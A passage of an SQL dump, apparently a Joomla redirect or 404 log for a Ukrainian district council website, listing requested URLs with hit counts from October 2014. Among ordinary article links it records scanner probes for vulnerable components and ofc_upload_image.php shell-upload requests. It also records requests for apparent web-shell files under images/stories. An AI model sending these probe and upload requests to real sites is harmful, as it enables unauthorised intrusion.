00:00:00',301),(7787,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1291:2014-04-23-11-37-34&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 18:09:41','0000-00-00 00:00:00',301),(7788,'http://www.malyn-rayrada.org.ua/cms/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',6,0,'2014-10-10 18:25:58','0000-00-00 00:00:00',301),(7789,'http://www.malyn-rayrada.org.ua/malk/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',9,0,'2014-10-10 18:32:05','0000-00-00 00:00:00',301),(7790,'http://www.malyn-rayrada.org.ua/razakcup/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',12,0,'2014-10-10 18:35:51','0000-00-00 00:00:00',301),(7791,'http://www.malyn-rayrada.org.ua/home/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',5,0,'2014-10-10 18:39:09','0000-00-00 00:00:00',301),(7792,'http://malyn-rayrada.org.ua/ind/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',31,0,'2014-10-10 18:42:15','0000-00-00 00:00:00',301),(7793,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1008:2013-05-20-07-02-57&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 18:42:34','0000-00-00 00:00:00',301),(7794,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1034:2013-06-23-15-11-25&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-10 18:42:36','0000-00-00 00:00:00',301),(7795,'http://www.malyn-rayrada.org.ua/deu/components/com_community/index.html','','','',1,0,'2014-10-10 18:45:15','0000-00-00 00:00:00',301),(7796,'http://www.malyn-rayrada.org.ua/deu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-10 18:45:20','0000-00-00 00:00:00',301),(7797,'http://www.malyn-rayrada.org.ua/site/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',15,0,'2014-10-10 18:47:20','0000-00-00 00:00:00',301),(7798,'http://malyn-rayrada.org.ua/portal/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-10 18:50:15','0000-00-00 00:00:00',301),(7799,'http://www.malyn-rayrada.org.ua/malva/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',10,0,'2014-10-10 18:54:18','0000-00-00 00:00:00',301),(7800,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-10-10 18:57:17','0000-00-00 00:00:00',301),(7801,'http://www.malyn-rayrada.org.ua/index.php/rishennja','','','',8,0,'2014-10-10 18:58:59','0000-00-00 00:00:00',301),(7802,'http://malyn-rayrada.org.ua/multimedia/components/com_community/index.html','','','',1,0,'2014-10-10 19:04:17','0000-00-00 00:00:00',301),(7803,'http://malyn-rayrada.org.ua/multimedia/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-10 19:04:23','0000-00-00 00:00:00',301),(7804,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59:--20062014-&Itemid=107&lang=ru','','','',3,0,'2014-10-10 19:05:32','0000-00-00 00:00:00',301),(7805,'http://www.malyn-rayrada.org.ua/Nouveau/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-10 19:09:07','0000-00-00 00:00:00',301),(7806,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-10-10 19:14:06','0000-00-00 00:00:00',301),(7807,'http://www.malyn-rayrada.org.ua/tnbmhl/components/com_community/index.html','','','',7,0,'2014-10-10 19:14:30','0000-00-00 00:00:00',301),(7808,'http://www.malyn-rayrada.org.ua/tnbmhl/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',7,0,'2014-10-10 19:14:34','0000-00-00 00:00:00',301),(7809,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1339:2014-06-12-09-22-34&catid=59&Itemid=107&lang=ru','','','',1,0,'2014-10-10 19:15:47','0000-00-00 00:00:00',301),(7810,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1124:2013-10-30-08-05-10&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 19:16:44','0000-00-00 00:00:00',301),(7811,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=956:2013-03-07-14-51-33&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 19:16:46','0000-00-00 00:00:00',301),(7812,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-10 19:28:02','0000-00-00 00:00:00',301),(7813,'http://www.malyn-rayrada.org.ua/page/components/com_community/index.html','','','',4,0,'2014-10-10 19:40:03','0000-00-00 00:00:00',301),(7814,'http://www.malyn-rayrada.org.ua/page/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',4,0,'2014-10-10 19:40:08','0000-00-00 00:00:00',301),(7815,'http://www.malyn-rayrada.org.ua/forum/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-10 19:44:09','0000-00-00 00:00:00',301),(7816,'http://malyn-rayrada.org.ua/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:18','0000-00-00 00:00:00',301),(7817,'http://malyn-rayrada.org.ua/FCKeditor/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:23','0000-00-00 00:00:00',301),(7818,'http://malyn-rayrada.org.ua/FCK/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/FCK/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:28','0000-00-00 00:00:00',301),(7819,'http://malyn-rayrada.org.ua/admin/FCKeditor/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/admin/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:32','0000-00-00 00:00:00',301),(7820,'http://malyn-rayrada.org.ua/manage/FCKeditor/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/manage/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:38','0000-00-00 00:00:00',301),(7821,'http://malyn-rayrada.org.ua/editor/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/editor/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:44','0000-00-00 00:00:00',301),(7822,'http://malyn-rayrada.org.ua/editor/FCKeditor/editor/dialog/fck_about.html','','http://malyn-rayrada.org.ua/editor/FCKeditor/editor/dialog/fck_about.html','',1,0,'2014-10-10 20:00:50','0000-00-00 00:00:00',301),(7823,'http://www.malyn-rayrada.org.ua/Joomla/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-10 20:01:22','0000-00-00 00:00:00',301),(7824,'http://malyn-rayrada.org.ua/malk/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-10 20:03:46','0000-00-00 00:00:00',301),(7825,'http://www.malyn-rayrada.org.ua/11/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-10 20:09:31','0000-00-00 00:00:00',301),(7826,'http://www.malyn-rayrada.org.ua/webescolarrevellodetoro/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',4,0,'2014-10-10 20:20:34','0000-00-00 00:00:00',301),(7827,'http://malyn-rayrada.org.ua/demo/components/com_community/index.html','','','',1,0,'2014-10-10 20:20:34','0000-00-00 00:00:00',301),(7828,'http://malyn-rayrada.org.ua/demo/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-10 20:20:40','0000-00-00 00:00:00',301),(7829,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57:--15042014-&id=1251:2014-03-24-07-11-22&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-10 20:23:03','0000-00-00 00:00:00',301),(7830,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1013:2013-06-01-03-58-38&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 20:23:05','0000-00-00 00:00:00',301),(7831,'http://www.malyn-rayrada.org.ua/skateboarding/components/com_community/index.html','','','',2,0,'2014-10-10 20:41:49','0000-00-00 00:00:00',301),(7832,'http://www.malyn-rayrada.org.ua/skateboarding/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-10 20:41:55','0000-00-00 00:00:00',301),(7833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=945:2013-03-04-07-28-58&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-10 20:45:14','0000-00-00 00:00:00',301),(7834,'http://www.malyn-rayrada.org.ua/netball/components/com_community/index.html','','','',1,0,'2014-10-10 20:46:56','0000-00-00 00:00:00',301),(7835,'http://www.malyn-rayrada.org.ua/netball/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-10 20:46:59','0000-00-00 00:00:00',301),(7836,'http://www.malyn-rayrada.org.ua/new/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',6,0,'2014-10-10 21:10:54','0000-00-00 00:00:00',301),(7837,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-10 21:14:49','0000-00-00 00:00:00',301),(7838,'http://www.malyn-rayrada.org.ua/neu/components/com_community/index.html','','','',2,0,'2014-10-10 21:31:21','0000-00-00 00:00:00',301),(7839,'http://www.malyn-rayrada.org.ua/neu/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',2,0,'2014-10-10 21:31:25','0000-00-00 00:00:00',301),(7840,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1145:2013-11-27-09-47-11&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 21:43:16','0000-00-00 00:00:00',301),(7841,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-10-10 21:43:21','0000-00-00 00:00:00',301),(7842,'http://www.malyn-rayrada.org.ua/website/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',3,0,'2014-10-10 22:29:25','0000-00-00 00:00:00',301),(7843,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-10 22:58:07','0000-00-00 00:00:00',301),(7844,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1124:2013-10-30-08-05-10&catid=11&lang=en&Itemid=0','','','',2,0,'2014-10-10 23:02:06','0000-00-00 00:00:00',301),(7845,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1110:-9-2013-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-10 23:17:43','0000-00-00 00:00:00',301),(7846,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=en','','','',3,0,'2014-10-10 23:53:27','0000-00-00 00:00:00',301),(7847,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=en&Itemid=','','','',1,0,'2014-10-10 23:54:59','0000-00-00 00:00:00',301),(7848,'http://www.malyn-rayrada.org.ua/fa/components/com_community/index.html','','','',1,0,'2014-10-11 00:05:02','0000-00-00 00:00:00',301),(7849,'http://www.malyn-rayrada.org.ua/fa/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-11 00:05:06','0000-00-00 00:00:00',301),(7850,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=939:-18-&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-11 00:06:17','0000-00-00 00:00:00',301),(7851,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1094:2013-09-24-05-02-52&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-11 00:13:03','0000-00-00 00:00:00',301),(7852,'http://www.malyn-rayrada.org.ua/mcc/components/com_community/index.html','','','',1,0,'2014-10-11 00:20:19','0000-00-00 00:00:00',301),(7853,'http://www.malyn-rayrada.org.ua/mcc/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-11 00:20:23','0000-00-00 00:00:00',301),(7854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-11 00:25:20','0000-00-00 00:00:00',301),(7855,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1321:------------------lr-&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-11 00:29:32','0000-00-00 00:00:00',301),(7856,'http://www.malyn-rayrada.org.ua/community/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',16,0,'2014-10-11 00:37:43','0000-00-00 00:00:00',301),(7857,'http://www.malyn-rayrada.org.ua/joomla-mairie/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-11 00:42:04','0000-00-00 00:00:00',301),(7858,'http://www.malyn-rayrada.org.ua/images/stories/link.php?rf','','','',7,0,'2014-10-11 02:14:55','0000-00-00 00:00:00',301),(7859,'http://malyn-rayrada.org.ua/undefined/','','','',42,0,'2014-10-11 02:45:39','0000-00-00 00:00:00',301),(7860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1170:2014-01-08-11-02-06&catid=11&lang=ru','','','',9,0,'2014-10-11 02:46:35','0000-00-00 00:00:00',301),(7861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-11 03:45:03','0000-00-00 00:00:00',301),(7862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-10-11 04:17:47','0000-00-00 00:00:00',301),(7863,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-10-11 04:17:50','0000-00-00 00:00:00',301),(7864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-10-11 04:49:32','0000-00-00 00:00:00',301),(7865,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=991:2013-04-22-08-24-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',4,0,'2014-10-11 04:51:33','0000-00-00 00:00:00',301),(7866,'http://www.malyn-rayrada.org.ua/images/stories/petx.php?baca?bajak','','','',3,0,'2014-10-11 05:03:41','0000-00-00 00:00:00',301),(7867,'http://www.malyn-rayrada.org.ua/images/stories/explore.php?baca?bajak','','','',3,0,'2014-10-11 05:03:48','0000-00-00 00:00:00',301),(7868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=958:-2010-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',13,0,'2014-10-11 06:40:00','0000-00-00 00:00:00',301),(7869,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=946:-l-r-2011-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 07:34:40','0000-00-00 00:00:00',301),(7870,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-11 07:34:44','0000-00-00 00:00:00',301),(7871,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-10-11 08:17:32','0000-00-00 00:00:00',301),(7872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-10-11 08:21:25','0000-00-00 00:00:00',301),(7873,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=887:-2013-&lang=en&option=com_content&view=article','','','',1,0,'2014-10-11 08:42:37','0000-00-00 00:00:00',301),(7874,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&lang=uk&option=com_content&view=article','','','',2,0,'2014-10-11 08:54:05','0000-00-00 00:00:00',301),(7875,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1146:2013-11-27-10-09-00&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 08:54:09','0000-00-00 00:00:00',301),(7876,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=960:-19-&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 09:26:04','0000-00-00 00:00:00',301),(7877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1227:2014-02-25-07-36-58&catid=11&Itemid=14&lang=ru','','','',15,0,'2014-10-11 10:09:49','0000-00-00 00:00:00',301),(7878,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53:--25102013-&Itemid=94&lang=ru','','','',8,0,'2014-10-11 10:36:41','0000-00-00 00:00:00',301),(7879,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49:--12042013-&id=985:2013-04-12-09-53-08&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 10:40:59','0000-00-00 00:00:00',301),(7880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51&Itemid=92&lang=en','','','',5,0,'2014-10-11 11:21:50','0000-00-00 00:00:00',301),(7881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49:--12042013-&Itemid=88&lang=en','','','',5,0,'2014-10-11 11:22:13','0000-00-00 00:00:00',301),(7882,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:-2013-2017-&catid=49:--12042013-&Itemid=88&lang=en','','','',4,0,'2014-10-11 11:25:56','0000-00-00 00:00:00',301),(7883,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1240:2014-03-17-07-01-32&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-11 11:36:11','0000-00-00 00:00:00',301),(7884,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=964:----------------------2013-2017-&catid=36&Itemid=70&lang=en','','','',1,0,'2014-10-11 11:55:03','0000-00-00 00:00:00',301),(7885,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1265:2014-04-01-11-43-46&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-11 11:59:01','0000-00-00 00:00:00',301),(7886,'http://www.malyn-rayrada.org.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:19:02','0000-00-00 00:00:00',301),(7887,'http://www.malyn-rayrada.org.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:19:08','0000-00-00 00:00:00',301),(7888,'http://www.malyn-rayrada.org.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:19:15','0000-00-00 00:00:00',301),(7889,'http://www.malyn-rayrada.org.ua/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:19:24','0000-00-00 00:00:00',301),(7890,'http://www.malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:19:31','0000-00-00 00:00:00',301),(7891,'http://www.malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:19:36','0000-00-00 00:00:00',301),(7892,'http://www.malyn-rayrada.org.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:19:40','0000-00-00 00:00:00',301),(7893,'http://www.malyn-rayrada.org.ua/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:19:44','0000-00-00 00:00:00',301),(7894,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:19:47','0000-00-00 00:00:00',301),(7895,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:19:59','0000-00-00 00:00:00',301),(7896,'http://www.malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:20:08','0000-00-00 00:00:00',301),(7897,'http://www.malyn-rayrada.org.ua/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:20:14','0000-00-00 00:00:00',301),(7898,'http://www.malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:20:18','0000-00-00 00:00:00',301),(7899,'http://www.malyn-rayrada.org.ua/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:20:21','0000-00-00 00:00:00',301),(7900,'http://www.malyn-rayrada.org.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:20:25','0000-00-00 00:00:00',301),(7901,'http://www.malyn-rayrada.org.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:20:43','0000-00-00 00:00:00',301),(7902,'http://www.malyn-rayrada.org.ua/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:20:34','0000-00-00 00:00:00',301),(7903,'http://www.malyn-rayrada.org.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:20:48','0000-00-00 00:00:00',301),(7904,'http://www.malyn-rayrada.org.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:20:52','0000-00-00 00:00:00',301),(7905,'http://www.malyn-rayrada.org.ua/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:20:59','0000-00-00 00:00:00',301),(7906,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:21:03','0000-00-00 00:00:00',301),(7907,'http://www.malyn-rayrada.org.ua/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:21:08','0000-00-00 00:00:00',301),(7908,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php','','','',1,0,'2014-10-11 12:21:20','0000-00-00 00:00:00',301),(7909,'http://www.malyn-rayrada.org.ua/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=alin.php.pHp','','','',1,0,'2014-10-11 12:21:25','0000-00-00 00:00:00',301),(7910,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1011:2013-05-29-09-51-28&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-11 12:34:48','0000-00-00 00:00:00',301),(7911,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=uk','','','',5,0,'2014-10-11 12:40:22','0000-00-00 00:00:00',301),(7912,'http://www.malyn-rayrada.org.ua/images/stories/test.php?rf','','','',1,0,'2014-10-11 12:57:43','0000-00-00 00:00:00',301),(7913,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:-2013-2017-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-11 13:00:26','0000-00-00 00:00:00',301),(7914,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=943:-qq&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 13:04:25','0000-00-00 00:00:00',301),(7915,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=ru','','','',5,0,'2014-10-11 13:22:23','0000-00-00 00:00:00',301),(7916,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=ru&Itemid=','','','',3,0,'2014-10-11 13:22:31','0000-00-00 00:00:00',301),(7917,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=935:----------14-112012332-l------r&catid=47:--21022013-&Itemid=86&lang=en','','','',2,0,'2014-10-11 13:45:16','0000-00-00 00:00:00',301),(7918,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=en','','','',9,0,'2014-10-11 13:45:17','0000-00-00 00:00:00',301),(7919,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-11 13:52:03','0000-00-00 00:00:00',301),(7920,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-11 13:54:33','0000-00-00 00:00:00',301),(7921,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-11 14:12:18','0000-00-00 00:00:00',301),(7922,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=36&Itemid=70&lang=en','','','',7,0,'2014-10-11 14:15:57','0000-00-00 00:00:00',301),(7923,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47&Itemid=86&lang=en','','','',1,0,'2014-10-11 14:16:01','0000-00-00 00:00:00',301),(7924,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:-2013-2015-&catid=47:-21022013-&Itemid=86&lang=en','','','',3,0,'2014-10-11 14:24:03','0000-00-00 00:00:00',301),(7925,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 14:34:43','0000-00-00 00:00:00',301),(7926,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-11 14:41:32','0000-00-00 00:00:00',301),(7927,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-11 14:45:36','0000-00-00 00:00:00',301),(7928,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1115:-24-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-11 15:01:59','0000-00-00 00:00:00',301),(7929,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1334:2014-06-06-05-54-20&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-11 15:04:12','0000-00-00 00:00:00',301),(7930,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1235:2014-03-06-13-25-26&lang=uk&option=com_content&view=article','','','',3,0,'2014-10-11 16:34:33','0000-00-00 00:00:00',301),(7931,'http://www.malyn-rayrada.org.ua/index.php/--29112013-','','','',7,0,'2014-10-11 16:43:51','0000-00-00 00:00:00',301),(7932,'http://www.malyn-rayrada.org.ua/index.php?id=7&Itemid=12&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2014-10-11 16:58:17','0000-00-00 00:00:00',301),(7933,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1141:2013-11-26-13-18-12&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-11 17:12:40','0000-00-00 